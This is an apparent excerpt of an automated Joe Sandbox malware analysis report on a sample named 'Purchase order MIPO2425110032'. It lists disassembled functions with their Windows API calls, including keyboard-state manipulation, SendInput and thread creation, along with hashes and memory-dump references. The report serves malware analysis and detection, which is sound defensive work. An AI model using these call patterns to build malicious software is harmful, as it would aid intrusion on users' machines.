                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                            • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                            • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Msctls_Progress32
                                                            • API String ID: 3850602802-3636473452
                                                            • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                            • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                            • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                            • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                            Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _malloc.LIBCMT ref: 0041F707
                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                            • _free.LIBCMT ref: 0041F71A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free_malloc
                                                            • String ID: [B
                                                            • API String ID: 1020059152-632041663
                                                            • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                            • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                            • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                                            • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                            Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                            • __calloc_crt.LIBCMT ref: 00413DB0
                                                            • __getptd.LIBCMT ref: 00413DBD
                                                            • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                            • _free.LIBCMT ref: 00413E07
                                                            • __dosmaperr.LIBCMT ref: 00413E12
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                            • String ID:
                                                            • API String ID: 155776804-0
                                                            • Opcode ID: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                            • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                            • Opcode Fuzzy Hash: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                            • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                            Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                              • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                            • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                            • String ID:
                                                            • API String ID: 1957940570-0
                                                            • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                            • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                            • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                            • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                            Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                            • ExitThread.KERNEL32 ref: 00413D4E
                                                            • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                            • __freefls@4.LIBCMT ref: 00413D74
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                            • String ID:
                                                            • API String ID: 259663610-0
                                                            • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                            • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                            • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                            • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                            Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 004302E6
                                                            • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                            • GetClientRect.USER32(?,?), ref: 00430364
                                                            • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                            • GetWindowRect.USER32(?,?), ref: 004303C3
                                                            • ScreenToClient.USER32(?,?), ref: 004303EC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Rect$Client$Window$MetricsScreenSystem
                                                            • String ID:
                                                            • API String ID: 3220332590-0
                                                            • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                            • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                            • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                            • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                            Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _malloc_wcslen$_strcat_wcscpy
                                                            • String ID:
                                                            • API String ID: 1612042205-0
                                                            • Opcode ID: 90bc39558da55aafea0c644d420268c7464c042d06742de0e50a33b275c20799
                                                            • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                            • Opcode Fuzzy Hash: 90bc39558da55aafea0c644d420268c7464c042d06742de0e50a33b275c20799
                                                            • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                            Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strncmp
                                                            • String ID: >$U$\
                                                            • API String ID: 2666721431-237099441
                                                            • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                            • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                            • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                            • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                            Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0044C570
                                                            • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$InputSend
                                                            • String ID:
                                                            • API String ID: 2221674350-0
                                                            • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                            • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                            • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                            • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                            Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$_wcscat
                                                            • String ID:
                                                            • API String ID: 2037614760-0
                                                            • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                            • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                            • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                            • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                            Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                            • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                            • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                            • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                            • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$Copy$AllocClearErrorLastString
                                                            • String ID:
                                                            • API String ID: 960795272-0
                                                            • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                            • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                            • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                            • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                            Function 00452D3F Relevance: 9.1, APIs: 6, Instructions: 144fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$Copy__fread_nolock
                                                            • String ID:
                                                            • API String ID: 2446588422-0
                                                            • Opcode ID: 79d811be90fff68cde7f06b13108d27ea7637e4834378253289aee473bd03d8a
                                                            • Instruction ID: e3b766f0d7570c057f36e817525b07a345c540c94ec9958bdefdc59333e68e6d
                                                            • Opcode Fuzzy Hash: 79d811be90fff68cde7f06b13108d27ea7637e4834378253289aee473bd03d8a
                                                            • Instruction Fuzzy Hash: D9517CB26083409BC320DF6AD984AAFB7E8FBD9740F10492FF68983201DA75D548CB56
                                                            Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                            • EndPaint.USER32(?,?), ref: 00447D13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                            • String ID:
                                                            • API String ID: 4189319755-0
                                                            • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                            • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                            • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                            • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                            Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                            • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                            • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow$InvalidateRect
                                                            • String ID:
                                                            • API String ID: 1976402638-0
